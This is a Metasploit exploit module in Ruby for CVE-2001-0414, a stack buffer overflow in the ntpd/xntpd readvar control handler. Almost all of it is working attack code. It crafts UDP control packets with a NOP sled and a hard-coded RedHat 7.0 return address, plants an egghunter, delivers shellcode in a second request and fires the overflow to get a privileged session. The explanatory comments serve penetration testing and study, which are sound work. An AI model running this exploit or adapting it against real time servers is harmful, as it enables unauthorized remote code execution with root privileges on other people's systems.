Path: blob/master/modules/exploits/multi/ntp/ntp_overflow.rb
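##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Remote stack buffer overflow in the ntpd/xntpd control-message ("readvar")
# handler, CVE-2001-0414.  The oversized request overwrites a saved return
# address with a stack address inside a NOP sled and lands a small egghunter
# stub there; the real payload is delivered in a *separate* control request and
# located in memory by the hunter, because the overflow corrupts the stack too
# badly to hold the full payload in place.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Egghunter

  # Registers module metadata.  Points an operator should know:
  #  * Every non-debug target is a hard-coded stack address for one exact
  #    RedHat 7.0 build of ntpd, i.e. a non-randomised stack.  A different
  #    distribution, build or environment layout needs a new 'Ret', and a wrong
  #    one normally just crashes ntpd - confirm the target before running this
  #    against a production time server.
  #  * 'Debugging' returns into 0xdeadbeef on purpose so the crash can be
  #    observed under a debugger; it never yields a session.
  #  * The encoded payload is prefixed with alarm(0) (i386 Linux syscall 27 with
  #    eax = 0) so any pending SIGALRM is cancelled before the shellcode runs.
  #  * Reverse-connect payloads are declared incompatible ('ConnectionType'),
  #    and the session is flagged privileged.
  #
  # @param info [Hash] module info merged by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NTP Daemon readvar Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack based buffer overflow in the
        ntpd and xntpd service. By sending an overly long 'readvar'
        request it is possible to execute code remotely. As the stack
        is corrupted, this module uses the Egghunter technique.
      },
      'Author'         => 'aushack',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2001-0414' ],
          [ 'OSVDB', '805' ],
          [ 'BID', '2540' ],
          [ 'US-CERT-VU', '970472' ],
        ],
      'Payload'        =>
        {
          # 220 bytes is the room left for the egg in the second request; the
          # framework rejects payloads that do not fit once encoded.
          'Space'           => 220,
          # ',' and '=' delimit variable names in readvar requests, so they
          # cannot appear inside the payload.
          'BadChars'        => "\x00\x01\x02\x16,=",
          'StackAdjustment' => -3500,
          'PrependEncoder'  => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0)
          'Compat'          =>
            {
              'ConnectionType' => '-reverse',
            },
        },
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86 ],
      'Targets'        =>
        [
          [ 'RedHat Linux 7.0 ntpd 4.0.99j',         { 'Ret' => 0xbffffbb0 } ],
          [ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug', { 'Ret' => 0xbffff980 } ],
          [ 'RedHat Linux 7.0 ntpd 4.0.99k',         { 'Ret' => 0xbffffbb0 } ],
          #[ 'FreeBSD 4.2-STABLE', { 'Ret' => 0xbfbff8bc } ],
          [ 'Debugging', { 'Ret' => 0xdeadbeef } ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2001-04-04',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(123)])
  end

  # Sends three UDP datagrams, in order:
  #   1. the oversized readvar request - control header, "stratum=", a NOP
  #      sled with the saved return address overwritten 220 bytes into the
  #      sled and the egghunter stub placed right behind it;
  #   2. a second readvar request carrying the egg (tag, tag, encoded payload);
  #   3. an empty readvar request with sequence number 2, which the module
  #      treats as the overflow trigger (the server-side reason the third
  #      datagram is needed is not evident from this code).
  # The 0.5 s pauses give ntpd time to consume each datagram; UDP gives no
  # acknowledgement, so nothing here can confirm delivery or success beyond
  # the handler receiving a session.
  #
  # @raise [Msf::Exploit::Failed] via fail_with if the hunter stub does not fit
  def exploit
    # generate_egghunter returns [hunter_stub, egg]; the checksum variant lets
    # the stub verify the egg before jumping to it.
    hunter, egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

    # NTP mode-6 control header: 0x16 = LI 0 / VN 2 / mode 6, 0x02 = readvar
    # opcode, then the 16-bit sequence number.  pkt1 opens the variable list.
    pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum="
    pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"

    ret_off    = 220 + pkt1.length   # where the saved return address is overwritten
    hunter_off = ret_off + 4         # egghunter stub sits right behind it

    # Refuse to send anything if the stub would run past the 512-byte request:
    # String#[]= silently extends the buffer instead of raising.
    if hunter_off + hunter.length > 512
      fail_with(Failure::BadConfig, "Egghunter stub (#{hunter.length} bytes) does not fit in the 512-byte request")
    end

    sploit = pkt1 + make_nops(512 - pkt1.length)
    sploit[ret_off, 4] = [target['Ret']].pack('V')   # little-endian 32-bit address
    sploit[hunter_off, hunter.length] = hunter

    connect_udp
    begin
      print_status("Trying target #{target.name}...")

      print_status("Sending hunter")
      udp_sock.put(sploit)
      Rex.sleep(0.5)

      print_status("Sending payload")
      udp_sock.put(pkt1 + egg)
      Rex.sleep(0.5)

      print_status("Calling overflow trigger")
      udp_sock.put(pkt2)
      Rex.sleep(0.5)

      handler
    ensure
      # Close the socket even if a send raises, rather than leaking it until
      # module cleanup.
      disconnect_udp
    end
  end
end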